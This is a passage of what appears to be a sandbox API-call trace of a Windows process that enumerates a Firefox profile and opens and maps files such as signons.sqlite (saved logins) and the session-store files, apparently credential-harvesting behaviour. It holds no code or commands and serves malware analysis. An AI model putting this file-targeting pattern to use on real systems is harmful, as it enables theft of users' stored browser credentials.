dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.639] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.639] CloseHandle (hObject=0x66c) returned 1 [0589.639] CloseHandle (hObject=0x668) returned 1 [0589.639] LocalFree (hMem=0x578c30) returned 0x0 [0589.639] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.639] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.639] lstrlenW (lpString="\\") returned 1 [0589.639] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.639] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.639] lstrlenW (lpString="sessionstore.bak") returned 16 [0589.639] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.639] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56afc8 [0589.639] LocalFree (hMem=0x578c30) returned 0x0 [0589.639] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.639] CloseHandle (hObject=0x668) returned 1 [0589.639] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0589.639] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0589.639] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x56c300, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak") returned 0x5d [0589.639] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.639] CloseHandle (hObject=0x668) returned 1 [0589.639] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.639] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbba [0589.639] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.639] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.640] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.640] CloseHandle (hObject=0x66c) returned 1 [0589.640] CloseHandle (hObject=0x668) returned 1 [0589.640] LocalFree (hMem=0x56c300) returned 0x0 [0589.640] LocalFree (hMem=0x56afc8) returned 0x0 [0589.640] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.640] lstrlenW (lpString="\\") returned 1 [0589.640] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.640] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.640] lstrlenW (lpString="sessionstore.js") returned 15 [0589.640] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.640] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56afc8 [0589.640] LocalFree (hMem=0x578c30) returned 0x0 [0589.640] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.640] CloseHandle (hObject=0x668) returned 1 [0589.640] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5c [0589.640] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56c300 [0589.640] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x56c300, nSize=0x5c | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js") returned 0x5c [0589.640] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.640] CloseHandle (hObject=0x668) returned 1 [0589.640] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.640] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23c [0589.641] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.641] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.641] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.641] CloseHandle (hObject=0x66c) returned 1 [0589.641] CloseHandle (hObject=0x668) returned 1 [0589.641] LocalFree (hMem=0x56c300) returned 0x0 [0589.641] LocalFree (hMem=0x56afc8) returned 0x0 [0589.641] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.641] lstrlenW (lpString="\\") returned 1 [0589.641] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.641] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.641] lstrlenW (lpString="signons.sqlite") returned 14 [0589.641] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.641] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.641] LocalFree (hMem=0x578c30) returned 0x0 [0589.641] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.641] CloseHandle (hObject=0x668) returned 1 [0589.641] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.641] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.641] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite") returned 0x5b [0589.641] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.641] CloseHandle (hObject=0x668) returned 1 [0589.641] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.642] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x50000 [0589.642] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.642] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x24c0000 [0589.644] UnmapViewOfFile (lpBaseAddress=0x24c0000) returned 1 [0589.645] CloseHandle (hObject=0x66c) returned 1 [0589.645] CloseHandle (hObject=0x668) returned 1 [0589.645] LocalFree (hMem=0x56c300) returned 0x0 [0589.645] LocalFree (hMem=0x56afc8) returned 0x0 [0589.645] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.645] lstrlenW (lpString="\\") returned 1 [0589.645] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.645] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.645] lstrlenW (lpString="times.json") returned 10 [0589.645] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.645] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x5e1d10 [0589.645] LocalFree (hMem=0x578c30) returned 0x0 [0589.645] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.645] CloseHandle (hObject=0x668) returned 1 [0589.645] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0589.645] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x578c30 [0589.645] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x578c30, nSize=0x57 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json") returned 0x57 [0589.645] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.645] CloseHandle (hObject=0x668) returned 1 [0589.645] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.645] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d [0589.645] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.645] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.646] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.646] CloseHandle (hObject=0x66c) returned 1 [0589.646] CloseHandle (hObject=0x668) returned 1 [0589.646] LocalFree (hMem=0x578c30) returned 0x0 [0589.646] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.646] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.646] lstrlenW (lpString="\\") returned 1 [0589.646] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.646] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.646] lstrlenW (lpString="urlclassifierkey3.txt") returned 21 [0589.646] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.646] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x5e1d10 [0589.646] LocalFree (hMem=0x578c30) returned 0x0 [0589.646] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.646] CloseHandle (hObject=0x668) returned 1 [0589.646] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x62 [0589.646] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x5e1e60 [0589.646] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x5e1e60, nSize=0x62 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt") returned 0x62 [0589.646] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.646] CloseHandle (hObject=0x668) returned 1 [0589.646] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.646] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9a [0589.646] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.646] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.647] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.647] CloseHandle (hObject=0x66c) returned 1 [0589.647] CloseHandle (hObject=0x668) returned 1 [0589.647] LocalFree (hMem=0x5e1e60) returned 0x0 [0589.647] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.647] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.647] lstrcmpiW (lpString1="weave", lpString2=".") returned 1 [0589.647] lstrcmpiW (lpString1="weave", lpString2="..") returned 1 [0589.647] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.647] lstrlenW (lpString="\\") returned 1 [0589.647] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.647] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.647] lstrlenW (lpString="weave") returned 5 [0589.647] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.647] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x5e1d10 [0589.647] LocalFree (hMem=0x578c30) returned 0x0 [0589.647] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.647] lstrlenW (lpString="\\*.*") returned 4 [0589.647] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.647] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x578c30 [0589.647] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*.*", lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 0x5b9b50 [0589.647] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.647] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.647] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.647] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.647] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.647] lstrcmpiW (lpString1="changes", lpString2=".") returned 1 [0589.647] lstrcmpiW (lpString1="changes", lpString2="..") returned 1 [0589.647] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.647] lstrlenW (lpString="\\") returned 1 [0589.647] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.647] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x5e1e40 [0589.647] lstrlenW (lpString="changes") returned 7 [0589.647] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0589.647] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.647] LocalFree (hMem=0x5e1e40) returned 0x0 [0589.648] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0589.648] lstrlenW (lpString="\\*.*") returned 4 [0589.648] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0589.648] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0589.648] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*.*", lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 0x5b9b10 [0589.648] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.648] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 1 [0589.648] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.648] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.648] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 0 [0589.648] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0589.648] LocalFree (hMem=0x56c300) returned 0x0 [0589.648] LocalFree (hMem=0x56afc8) returned 0x0 [0589.648] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.648] lstrcmpiW (lpString1="failed", lpString2=".") returned 1 [0589.648] lstrcmpiW (lpString1="failed", lpString2="..") returned 1 [0589.648] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.648] lstrlenW (lpString="\\") returned 1 [0589.648] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.648] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x5e1e40 [0589.648] lstrlenW (lpString="failed") returned 6 [0589.648] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0589.648] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56afc8 [0589.648] LocalFree (hMem=0x5e1e40) returned 0x0 [0589.648] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0589.648] lstrlenW (lpString="\\*.*") returned 4 [0589.648] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0589.648] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0589.648] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*.*", lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 0x5b9b10 [0589.648] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.648] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 1 [0589.648] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.648] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.648] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 0 [0589.648] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0589.648] LocalFree (hMem=0x56c300) returned 0x0 [0589.648] LocalFree (hMem=0x56afc8) returned 0x0 [0589.648] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.648] lstrcmpiW (lpString1="toFetch", lpString2=".") returned 1 [0589.648] lstrcmpiW (lpString1="toFetch", lpString2="..") returned 1 [0589.648] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.648] lstrlenW (lpString="\\") returned 1 [0589.648] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.648] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x5e1e40 [0589.649] lstrlenW (lpString="toFetch") returned 7 [0589.649] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0589.649] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.649] LocalFree (hMem=0x5e1e40) returned 0x0 [0589.649] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0589.649] lstrlenW (lpString="\\*.*") returned 4 [0589.649] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0589.649] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0589.649] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*.*", lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 0x5b9b10 [0589.649] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.649] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 1 [0589.649] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.649] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.649] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5e8 | out: lpFindFileData=0x52d5e8) returned 0 [0589.649] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0589.649] LocalFree (hMem=0x56c300) returned 0x0 [0589.649] LocalFree (hMem=0x56afc8) returned 0x0 [0589.649] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: 